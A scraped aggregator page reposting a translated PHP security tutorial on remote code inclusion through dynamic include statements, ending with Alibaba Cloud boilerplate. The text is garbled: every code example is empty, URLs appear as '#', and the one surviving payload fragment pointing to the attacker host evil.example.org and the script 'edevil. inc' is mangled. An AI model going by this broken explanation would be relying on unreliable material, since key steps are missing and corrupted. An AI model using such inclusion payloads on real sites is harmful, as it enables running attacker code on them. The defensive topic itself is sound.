PHP Security-code injection

Source: Internet
Author: User
A particularly dangerous situation is when you try to use contaminated data as the leading part of dynamic inclusion:



Code injection

A particularly dangerous situation is when you try to use contaminated data as the leading part of dynamic inclusion:

 
 


In this case, attackers can manipulate not only file names, but also the resources they contain. By default, PHP can contain not only files, but also the following resources (controlled by allow_url_fopen in the configuration file ):

 
 


At this time, the include statement will include the # Web page source code as a local file. Although the above example is harmless, imagine what happens if the source code returned by GOOGLE contains PHP code. In this way, the included PHP code will be parsed and executed. This is a good opportunity for attackers to release malicious code to destroy your security system.

Imagine that the path value points to the resources controlled by the following attackers:

#... E.org % 2fedevil. inc % 3F

In the preceding example, the path value is URL encoded. the original value is as follows:

#

This causes the include statement to include and execute the script selected by the attacker (edevil. inc), and the original file name/header. inc will be considered as a request string:

  
 


In this way, attackers avoid the need to guess the remaining directory and file name (/header. onc) and establish the same path and file name on evil.example.org. On the contrary, when the specific file name of the website under attack is blocked, he only needs to ensure that the code he wants to execute is valid in edevil. inc.

This situation is as dangerous as allowing attackers to directly modify PHP code on your website. Fortunately, you only need to filter data before the include and require statements to prevent this situation:

 

The above is PHP Security-code injection content. For more information, see PHP Chinese website (www.php1.cn )!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.